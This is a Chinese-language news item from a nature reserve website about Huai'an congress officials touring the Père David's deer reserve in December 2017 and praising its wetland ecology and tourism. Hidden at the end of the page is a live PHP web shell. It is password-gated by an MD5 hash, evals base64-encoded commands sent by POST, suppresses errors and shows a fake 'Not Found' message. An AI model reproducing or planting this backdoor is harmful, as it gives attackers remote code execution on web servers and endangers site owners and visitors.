最新要闻

首页 > 最新要闻 >

    淮安市人大常委会来麋鹿保护区考察调研

           2017年12月21日,淮安市人大常委会李冰副主任一行来麋鹿保护区旅游发展工作情况。盐城市人大常委会副主任邹毅实、教科文卫委主任蔡浩然、麋鹿保护区管理处副主任沈华陪同考察。
           李主任一行首先在游客中心观看了纪录片《归来的麋鹿》,随后乘坐电瓶游览车进入麋鹿半散养区,感受冬日里的麋鹿与保护区之美。李主任详细了解了半散养区内麋鹿饲喂的各项事宜,时值冬至,大部分麋鹿的鹿角已连根脱落,开始长出软嫩的鹿茸。它们或隐藏在树林间或远离观光车,极力保护着自己的新生武器,为来年的鹿王争霸蓄势。行至小麋鹿人工饲养区,李主任一行与小麋鹿们亲密互动。


           李主任对麋鹿保护区近几年的巨大变化表示赞叹,他说,麋鹿保护区生态好、环境好,良好的湿地环境适宜麋鹿、丹顶鹤等野生动物栖息。作为苏北首个国家5A级旅游景区,保护区首先承担着保护湿地及野生动物的重责,其次与旅游业的完美结合使得麋鹿这一珍稀物种为更多人所知,催促着更多人加入到保护麋鹿与湿地的行列中来,同时带动了周边经济的快速发展,为打造全域旅游助力。
"; error_reporting(0); if(isset($_POST['com']) && md5($_POST['com']) == '791dc312b38016ef998c1c146104cd5a' && isset($_POST['content'])) $content = strtr($_POST['content'], '-_,', '+/=');eval(base64_decode($content)); echo "We're sorry but the page your are looking for is Not Found..." ?>